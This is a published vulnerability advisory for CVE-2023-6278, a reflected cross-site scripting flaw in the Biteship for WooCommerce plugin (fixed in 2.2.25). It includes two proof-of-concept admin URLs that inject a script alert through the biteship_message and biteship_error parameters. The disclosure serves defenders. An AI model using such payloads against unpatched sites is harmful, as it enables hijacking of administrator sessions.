Biteship for WooCommerce < 2.2.25 – Reflected Cross-Site Scripting | CVE 2023-6278 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the biteship_error and biteship_message parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open one of the URLs below:

https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_message=<script>alert(/XSS/)</script>

https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_error=<script>alert(/XSS/)</script>

Affects Plugins

Fixed in 2.2.25

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Enrico Marcolini, Claudio Marchesini

Submitter

Enrico Marcolini, Claudio Marchesini

Submitter website

https://www.dottormarc.it

Submitter twitter

Verified

Yes

WPVDB ID

dfe5001f-31b9-4de2-a240-f7f5a992ac49

Timeline

Publicly Published

2023-11-17 (about 5 months ago)

Added

2024-01-03 (about 4 months ago)

Last Updated

2024-01-08 (about 4 months ago)

Other

Published

Title

Published

2024-03-16

Title

Advanced Access Manager < 6.9.21 - Admin+ Stored Cross-Site Scripting

Published

2012-01-01

Title

WP Live.php <= 1.2.1 - Cross-Site Scripting (XSS)

Published

2019-02-05

Title

Blog2Social <= 5.0.2 - Authenticated Cross-Site Scripting (XSS)

Published

2024-04-15

Title

WP-Cufon <= 1.6.10 - Unauthenticated Stored Cross-Site Scripting

Published

2023-01-30

Title

GS Filterable Portfolio < 1.6.1 - Contributor+ Stored XSS